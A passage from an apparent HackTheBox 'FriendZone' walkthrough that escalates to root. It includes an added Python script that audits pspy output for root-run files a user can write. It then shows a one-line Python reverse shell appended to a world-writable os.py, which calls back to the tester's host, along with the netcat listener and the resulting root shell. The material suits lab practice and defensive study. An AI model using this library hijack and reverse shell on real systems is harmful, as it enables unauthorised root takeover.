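Checking every path a root job touches against our own permissions is the step that turns the pspy listing above into the os.py finding. The following is an added example, not code from the original writeup or from the FriendZone box: it parses pspy "FS:" lines, then reports each touched file, and the directory holding it, that the given uid/gids could change. The demo builds a constructed temp directory with a world-writable os.py and a normal site.py and audits it as www-data (uid 33, gid 33, the shell we have on the box); the pspy lines and paths in the demo are constructed, not captured from the target.

```python
import os
import re
import shutil
import stat
import tempfile

# pspy -f line: "2020/02/19 14:32:01 FS: OPEN | /path" or "FS: OPEN DIR | /path"
FS_RE = re.compile(r"^\S+ \S+ FS:\s+(?P<event>[A-Z_]+)(?: DIR)?\s+\|\s+(?P<path>\S+)$")


def parse_pspy_paths(lines):
    """Unique paths from pspy FS events, in first-seen order (CMD lines skipped)."""
    paths = []
    for line in lines:
        m = FS_RE.match(line.rstrip("\n"))
        if m and m["path"] not in paths:
            paths.append(m["path"])
    return paths


def writable_by(path, uid, gids):
    """Reason a user with this uid and these gids could change `path`, or
    None. Anything root runs should be root-owned and not group/world
    writable; a symlink is reported so its target gets checked too."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    if stat.S_ISLNK(st.st_mode):
        return "symlink"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid in gids:
        return "group-writable (gid %d)" % st.st_gid
    if st.st_uid == uid:
        return "owned by uid %d" % uid
    return None


def audit(lines, uid, gids):
    """Check every file the root job touched, and the directory holding it
    (a writable directory lets the file be replaced even if it is read-only).
    Returns sorted (path, reason) pairs."""
    findings = {}
    for path in parse_pspy_paths(lines):
        parent = os.path.dirname(path.rstrip("/"))
        for candidate in (path, parent):
            if candidate and candidate not in findings:
                reason = writable_by(candidate, uid, gids)
                if reason:
                    findings[candidate] = reason
    return sorted(findings.items())


def demo():
    """Constructed scenario (not the real /usr/lib/python2.7): a temp dir
    with a world-writable os.py and a normal site.py, audited as www-data
    (uid 33, gid 33). Returns (basename, reason) pairs."""
    tmp = tempfile.mkdtemp(prefix="pspy-audit-")
    try:
        os_py = os.path.join(tmp, "os.py")
        site_py = os.path.join(tmp, "site.py")
        for p in (os_py, site_py):
            with open(p, "w") as fh:
                fh.write("# placeholder module\n")
        os.chmod(os_py, 0o777)   # the misconfiguration found on FriendZone
        os.chmod(site_py, 0o644)
        lines = [  # constructed pspy output in the format shown above
            "2020/02/19 14:32:01 CMD: UID=0 PID=17109 | /usr/bin/python /opt/server_admin/reporter.py",
            "2020/02/19 14:32:01 FS: OPEN | " + site_py,
            "2020/02/19 14:32:01 FS: OPEN | " + os_py,
            "2020/02/19 14:32:01 FS: CLOSE_NOWRITE | " + os_py,
            "2020/02/19 14:32:01 FS: OPEN DIR | " + tmp,
        ]
        return [(os.path.basename(p), why) for p, why in audit(lines, uid=33, gids={33})]
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for name, why in demo():
        print(f"{name}: {why}")
```

On the real box you would feed the saved pspy output to audit() with os.getuid() and os.getgroups() of the shell you hold; the parent-directory check matters because a read-only os.py inside a writable directory can simply be replaced.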
Modify os.py library
reporter.py imports os, so Python executes /usr/lib/python2.7/os.py as root every time cron runs the job. Any code we append to os.py therefore runs as root on the next execution, and we use that to get a root shell. Note that the same line also runs in every other Python process on the box that imports os, including our own, so it should be removed as soon as the root shell is in.
friend@FriendZone:~$ vi /usr/lib/python2.7/os.py
friend@FriendZone:~$ tail -n 3 /usr/lib/python2.7/os.py
except NameError: # statvfs_result may not exist
pass
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.26",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Raise the listener
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
We wait for the next cron execution, and the reverse shell comes back as root.
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.123.
Ncat: Connection from 10.10.10.123:39988.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty; pty.spawn("/bin/bash")'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site.py", line 68, in <module>
    import os
  File "/usr/lib/python2.7/os.py", line 743, in <module>
    import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.26",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused
Python fails because our appended line runs in every interpreter that imports os, including the one we just started from the root shell: it tries to connect back to 10.10.14.26:4446, where nothing is listening any more, and the import aborts with Connection refused. So we remove the line from os.py, using the friend session:
friend@FriendZone:~$ vi /usr/lib/python2.7/os.py
friend@FriendZone:~$ tail -n 3 /usr/lib/python2.7/os.py
                                 _make_statvfs_result)
except NameError: # statvfs_result may not exist
    pass
Then we make the root shell more comfortable:
# python -c 'import pty; pty.spawn("/bin/bash")'
root@FriendZone:~# stty raw -echo
stty raw -echo
root@FriendZone:~# export TERM=screen
Root flag
root@FriendZone:~# cat /root/root.txt <ROOT_FLAG>
References
- Local File Inclusion (LFI) — Web Application Penetration Testing
- Tricky ways to exploit PHP Local File Inclusion
Daniel Simao 07:00, 18 February 2020 (EST)